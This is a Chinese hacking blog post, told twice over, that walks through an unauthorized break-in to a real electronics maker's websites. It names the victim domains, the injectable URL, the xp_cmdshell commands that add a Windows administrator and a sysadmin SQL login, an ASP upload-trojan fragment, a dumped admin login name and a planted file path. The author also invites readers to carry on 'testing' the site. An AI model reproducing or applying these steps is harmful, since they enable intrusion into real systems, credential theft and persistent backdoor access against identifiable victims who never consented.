很多入侵方式,大家都看过,也都知道。但是真正入侵时,你是否会想起你所会的所有入侵的思路呢?
重点是入侵网站要多思考,多实验,还有不断的在平时充实自己。
黑基的动画教程,你是否都看过呢?是否认为里面没什么技术含量?都很垃圾呢?关键在于总结,很多动画都很普通,但是里面有很多思路。黑基soft.hackbsae.com每天都更新.你都看过,并且都掌握了,还要能学有所用。那么你也不会只是在行列了。
介绍1个我入侵时间最长的网站.
也是介绍点思路给大家.关于从哪入手入侵站.
一日看电脑报介绍数码产品.
介绍这个站www.huaqi.com 是生产aigo品牌的厂商华旗资讯
首先要想到这个站是什么类型的站.
打开http://www.huaqi.com/index.asp
打开看程序是asp的
第1步 就是用X-SCAN扫1下看服务器开什么端口漏洞
结果1无所获
第2步 是注入了
www.huaqi.com/news/viewnews.asp?id=2259
试下
www.huaqi.com/news/viewnews.asp?id=2259';
and 1=1 and 1=2
不行注入不了
接着检查所有的asp?id这样的连接一遍
还是没有注入点.
第3步 看能不能爆库
2级目录 /替换%5c
www.huaqi.com/news%5cviewnews.asp?id=2259
找不到数据库,也不想到用插入1句马的方法了
还是不行
第4步 看到在线服务里有个论坛
版本: LB5000XP v0403
找了1下 .cgi的没有到下手点
第5步 穷举1下
看看各个主要目录下有没有upfile.asp或upload.asp等上传常用名字文件.
都找了1边没找到
第6步 用工具扫扫后台
扫了又扫,还是没有结果
第7个想法 旁注1下
用domain扫了1下有4个域名但是没有常见上传漏洞、后台、数据库。
也没扫到注入点.也没有可以爆库的地方.
不要太相信工具还是手动1个1个找找吧.
www.huaqi.com
www.aigo.com 和huaqi.com是1个内容
www.aigoresearch.com 都是html单页面
www.huaqidaili.com 这里只有1个登陆口 没帐号密码还进不去
到这里了,要放弃吗?不.
第8步 发现DVBBS,被成漏洞最多的论坛 。
进http://www.huaqidaili.com随便输入个帐号密码
进到1个论坛提示密码错误又返回这个页面
看到他是DVBBS 我们直接进http://www.huaqidaili.com/bbs
进来了,试试默认管理员帐号密码,默认数据库,upfile.asp
和动网的一些插件,试图1句话的马,可是1无所获.
这时看到Powered By :Dvbbs Version 7.0.0 Sp2 sql他是sql数据库
一般这样的就更难了,他还没开放注册用户。
在他论坛转了转,发现管理员ID,试1下穷举密码吧。
唉还是不可以...这时想到了放弃...
第9步 用搜索引擎来帮助我们
一般大站安全都比较高,不过他内容也多,带来的隐患也就更多。
去www.baidu.com搜索1下site:www.huaqidaili.com
看看他这个站下到底有什么内容.不会只有1个论坛.
找到相关网页约5,560篇
果然还有其他的,找到1个连接
www.huaqidaili.com/expire/news/show.asp?stri=1571
进去看1下代理商平台
asp?看到这样的 第1个想法还是注入了
试下果然可以注入了.居然sa权限.sql数据库、
用domain可以执行DOS命令,执行sql命令.我都试过了。
用命令建立过管理员帐号密码,
exec xp_cmdshell 'net user badwolf 123456 /add'
exec xp_cmdshell 'net localGroup Administrators badwolf /add'
用HDSI开了3389提示成功。结果连不上。
还建立了sql数据库的权限
exec master..sp_addlogin badwolf,123456
exec master..sp_addsrvrolemember badwolf,sysadmin
连接1433端口还是连不上
建立完了连不上,再扫1下服务器IP只开80端口.估计是内网映射.
这时我1个用到了domain的mssql辅助工具的列目录找到他网站存放文件的目录.
在d:\huaqi下是www.huaqi.com的目录
试着写入1下 xp_cmdshell 我们最常用的上传木马
上传到D:\huaqi\up.asp 建立新的文件 选择"追加"
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
.......
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
结果没有成功 什么也没写入进去
然后换下wscript.shell同样方法上传上去了 up.asp
结果上传上去的文件少了
<% %>这写主要内容
木马没什么用 就是1个普通写字版.
还是夸库 扫他数据库吧 找到网站管理员密码 扫到1写admin表 把密码都记录下来
在找他后台吧.用domain的列目录功能.1个目录1个目录试吧..
找到几个后台 d:\huaqi\international\back_adm
_adm/main.asp">http://www.huaqi.com/international/back_adm/main.asp 这是1个后台
猜到数据库猜到密码登陆,
admin_name:f6
admin_password:***********
登陆进去里面有上传文件的地方,
登陆后,试图上传1下木马格式的文件asa asp cer cdx jsp php cgi能试的都试1边 还是不可以
上传1个图片 用WSockExpert.exe截1下cookies 上传1下试试 还是不行
不找了,脑袋都迷糊了.用上传工具传个几个文字算了,提示1下他的漏洞.
www.huaqi.com/hack.asp
文章也写到这里了...主要是告诉大家,要多思路而已.
哪位接着测试就测试吧...建议大家不要修改人家数据.
我国内站数不胜数,1次没改过人家首页,也没删除过别人数据,也没挂过马.
学习这些知识是更好的充实自己,而不是破坏.
重点是入侵网站要多思考,多实验,还有不断的在平时充实自己。
黑基的动画教程,你是否都看过呢?是否认为里面没什么技术含量?都很垃圾呢?关键在于总结,很多动画都很普通,但是里面有很多思路。黑基soft.hackbsae.com每天都更新.你都看过,并且都掌握了,还要能学有所用。那么你也不会只是在行列了。
介绍1个我入侵时间最长的网站.
也是介绍点思路给大家.关于从哪入手入侵站.
一日看电脑报介绍数码产品.
介绍这个站www.huaqi.com 是生产aigo品牌的厂商华旗资讯
首先要想到这个站是什么类型的站.
打开http://www.huaqi.com/index.asp
打开看程序是asp的
第1步 就是用X-SCAN扫1下看服务器开什么端口漏洞
结果1无所获
第2步 是注入了
www.huaqi.com/news/viewnews.asp?id=2259
试下
www.huaqi.com/news/viewnews.asp?id=2259';
and 1=1 and 1=2
不行注入不了
接着检查所有的asp?id这样的连接一遍
还是没有注入点.
第3步 看能不能爆库
2级目录 /替换%5c
www.huaqi.com/news%5cviewnews.asp?id=2259
找不到数据库,也不想到用插入1句马的方法了
还是不行
第4步 看到在线服务里有个论坛
版本: LB5000XP v0403
找了1下 .cgi的没有到下手点
第5步 穷举1下
看看各个主要目录下有没有upfile.asp或upload.asp等上传常用名字文件.
都找了1边没找到
第6步 用工具扫扫后台
扫了又扫,还是没有结果
第7个想法 旁注1下
用domain扫了1下有4个域名但是没有常见上传漏洞、后台、数据库。
也没扫到注入点.也没有可以爆库的地方.
不要太相信工具还是手动1个1个找找吧.
www.huaqi.com
www.aigo.com 和huaqi.com是1个内容
www.aigoresearch.com 都是html单页面
www.huaqidaili.com 这里只有1个登陆口 没帐号密码还进不去
到这里了,要放弃吗?不.
第8步 发现DVBBS,被成漏洞最多的论坛 。
进http://www.huaqidaili.com随便输入个帐号密码
进到1个论坛提示密码错误又返回这个页面
看到他是DVBBS 我们直接进http://www.huaqidaili.com/bbs
进来了,试试默认管理员帐号密码,默认数据库,upfile.asp
和动网的一些插件,试图1句话的马,可是1无所获.
这时看到Powered By :Dvbbs Version 7.0.0 Sp2 sql他是sql数据库
一般这样的就更难了,他还没开放注册用户。
在他论坛转了转,发现管理员ID,试1下穷举密码吧。
唉还是不可以...这时想到了放弃...
第9步 用搜索引擎来帮助我们
一般大站安全都比较高,不过他内容也多,带来的隐患也就更多。
去www.baidu.com搜索1下site:www.huaqidaili.com
看看他这个站下到底有什么内容.不会只有1个论坛.
找到相关网页约5,560篇
果然还有其他的,找到1个连接
www.huaqidaili.com/expire/news/show.asp?stri=1571
进去看1下代理商平台
asp?看到这样的 第1个想法还是注入了
试下果然可以注入了.居然sa权限.sql数据库、
用domain可以执行DOS命令,执行sql命令.我都试过了。
用命令建立过管理员帐号密码,
exec xp_cmdshell 'net user badwolf 123456 /add'
exec xp_cmdshell 'net localGroup Administrators badwolf /add'
用HDSI开了3389提示成功。结果连不上。
还建立了sql数据库的权限
exec master..sp_addlogin badwolf,123456
exec master..sp_addsrvrolemember badwolf,sysadmin
连接1433端口还是连不上
建立完了连不上,再扫1下服务器IP只开80端口.估计是内网映射.
这时我1个用到了domain的mssql辅助工具的列目录找到他网站存放文件的目录.
在d:\huaqi下是www.huaqi.com的目录
试着写入1下 xp_cmdshell 我们最常用的上传木马
上传到D:\huaqi\up.asp 建立新的文件 选择"追加"
<% dim objFSO %>
<% dim fdata %>
<% dim objCountFile %>
<% on error resume next %>
.......
<% Response.write "<textarea name=cyfddata cols=80 rows=10 width=32></textarea>" %>
<% Response.write "<input type=submit value=保存>" %>
<% Response.write "</form>" %>
结果没有成功 什么也没写入进去
然后换下wscript.shell同样方法上传上去了 up.asp
结果上传上去的文件少了
<% %>这写主要内容
木马没什么用 就是1个普通写字版.
还是夸库 扫他数据库吧 找到网站管理员密码 扫到1写admin表 把密码都记录下来
在找他后台吧.用domain的列目录功能.1个目录1个目录试吧..
找到几个后台 d:\huaqi\international\back_adm
_adm/main.asp">http://www.huaqi.com/international/back_adm/main.asp 这是1个后台
猜到数据库猜到密码登陆,
admin_name:f6
admin_password:***********
登陆进去里面有上传文件的地方,
登陆后,试图上传1下木马格式的文件asa asp cer cdx jsp php cgi能试的都试1边 还是不可以
上传1个图片 用WSockExpert.exe截1下cookies 上传1下试试 还是不行
不找了,脑袋都迷糊了.用上传工具传个几个文字算了,提示1下他的漏洞.
www.huaqi.com/hack.asp
文章也写到这里了...主要是告诉大家,要多思路而已.
哪位接着测试就测试吧...建议大家不要修改人家数据.
我国内站数不胜数,1次没改过人家首页,也没删除过别人数据,也没挂过马.
学习这些知识是更好的充实自己,而不是破坏.
回复Comments
{commenttime}{commentauthor}
{CommentUrl}
{commentcontent}